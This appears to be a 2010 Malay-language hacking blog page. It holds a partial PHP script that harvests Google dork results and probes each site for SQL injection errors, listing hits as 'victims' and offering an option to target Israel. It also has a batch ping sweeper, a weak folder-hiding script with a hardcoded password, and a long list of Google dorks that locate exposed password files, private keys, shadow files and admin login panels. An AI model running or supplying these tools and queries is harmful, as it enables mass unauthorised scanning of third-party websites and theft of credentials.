  33.    
  34.     if(!$argv[1]) {
  35.         print "[%] Usage: $argv[0] <dork> <country>n";
  36.         print "[%] Example : $argv[0] inurl:news.php?id= 3nn";        
  37.         print "Country";
  38.         print "t1 - All Searchn";
  39.         print "t2 - Search in Malaysia Onlyn";
  40.         print "t3 - Search in F*** Israel n";
  41.         exit;
  42.     }
  43.    
  44.     if (!$argv[2] or !(in_array($argv[2], $country))) {
  45.         $goo = "http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N";
  46.     } else {
  47.         foreach ($country as $i) {
  48.             if ($argv[2] == $i)
  49.                 $goo = "http://www.google.com/search?q=$argv[1]&num=100&hl=en&as_qdr=all&start=$i&sa=N&cr=country$i";
  50.         }
  51.     }
  52.     for($i = 0; $i <= 900; $i += 100) {
  53.         $fp = @file_get_contents($goo);
  54.         @preg_match_all("/<h3 class=(.*?)><a href="(.*?)" class=(.*?)>/", $fp, $links);
  55.         $url[] = $links[2];
  56.     }
  57.    
  58.     print "[@] Pencarian dimulakan...n";
  59.     print "[@] Sekarang mencari Vulnerablen";
  60.     foreach($url as $key) {
  61.         foreach($key as $value) {
  62.             $fp = @file_get_contents($value."'");
  63.             foreach($bug as $error) {
  64.                 if(@preg_match("/$error/", $fp)) {
  65.                     print "[#] Manggsa >> $value'n";
  66.                     $vuln++;
  67.                 } else {
  68.                     $not_vuln++;
  69.                 }
  70.                 $total++;
  71.             }
  72.         }
  73.     }
  74.    
  75.     print "[@] Scanning Selesain";
  76.     print "[%] Keputusann";
  77.     print "[-] JUMLAH Vulnerable: $vulnn";
  78.     print "[-] JUMLAH Bukan Vulnerable : $not_vulnn";
  79.     print "[-] Jumlah Website scanned : $totaln";
  80. ?>


Monday, December 6, 2010

Ping sweeper - batch script

This simple ping sweeper to a giving range of IP..


@echo off  
cls
@color 0A  
echo  
echo *************************  
echo *  @pih ping sweeper    *  
echo *************************    
echo.       
for /l %%a in (1,1,255) do (  
ping -n 1 10.19.127.%%a | find "Reply" 

Simply copy and paste in notepad & save it as ping_sweeper.bat


Wednesday, December 1, 2010

Lock folder batch script

Just copy all code and paste it in notepad..
Save it as anything.bat

It will create a folder call "private" and there is place that you put your files

Quote:
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Anda Pasti Untuk Kunci Folder ini?(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder dikunci
goto End
:UNLOCK
echo =====Folder Locked v.1=====
echo Masukkan Password Untuk Unlock Folder>
set/p "pass=>"
if NOT %pass%== abc123 goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked Berjaya
goto End
:FAIL
echo Password Salah la Encik
goto end
:MDLOCKER
md Sulit
echo Folder Sulit Berjaya Dihasilkan
goto End
:End


Google Hacking code

admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors |

administrators | users) "# -FrontPage-"
inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg
-site:sourceforge.net
"parent directory" +proftpdpasswd
"
Duclassified" -site:duware.com "DUware All Rights
reserved"
"
duclassmate" -site:duware.com
"
Dudirectory" -site:duware.com
"
dudownload" -site:duware.com
"
Elite Forum Version *.*"
"
Link Department"
"sets mode: +k"
"your password is" filetype:log
"
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration"
-intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd"
database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername"
+intext:"defaultpassword"
filetype:reg reg +intext:â?�WINVNC3â?�
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" |
"values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"
EZGuestbook"
intext:"
Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend
Scripting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp |
voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of
intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendarscript/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" |
inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage
-"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual
Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000
-bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial
-download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial
-download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete"
"Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin
-site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session
with" OR intitle:"Data Frame - Browser not HTTP 1.1
compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news"
-demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID"
-site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform"
inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the
management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"
CuteNews" "2003..2005 CutePHP"
"
DWMail" password intitle:dwmail
"
Merak Mail Server Software" -.gov -.mil -.edu
-site:merakmailserver.com
"
Midmart Messageboard" "Administrator Login"
"
Monster Top List" MTL numrange:200-
"
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail Development
Team"
"SysCP - login"
"This is a restricted Access Server" "Javascript Not
Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an
administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login"
-inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer
Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our
website. Please authenticate yourself to continue."
"You have requested to access the management functions"
-.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwt
hreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo")
-family
(intitle:"WmSC e-Cart
Administration")|(intitle:"WebMyStyle e-Cart
Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp)
-site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner
password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server
CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change
your password and user name. If new username is left
blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your
domain."
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password"
inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server
Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE"
inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to
provide login account information for *" | "Please
provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration"
"Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log
in! You will have to accept cookies in order to log in"
-demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please
enter your User ID and Password in the spaces provided
below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user
name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel"
intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms
-inurl:asternic -inurl:sip -intitle:ANNOUNCE
-inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the
SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index")
-dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com"
inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have
cookies enabled in order to log into the site." ext:php
OR ext:cgi
intitle:"Merak Mail Server Web Administration"
-ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise"
-inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service
and a language."
intitle:"oMail-admin Administration - Login"
-inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"php icalendar administration"
-site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin -
sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site
designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please
activate Javascript!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:"
inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for
authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login"
inurl:console
intitle:"Welcome Site/User Administrator" "Please select
the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N
Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite
inurl:admin
intitle:"XMail Web Administration Interface"
intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam
Application Login")|("Trackercam Remote")
-trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page |
inurl:sake.servlet
intitle:Group-Office "Enter your username and password
to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell,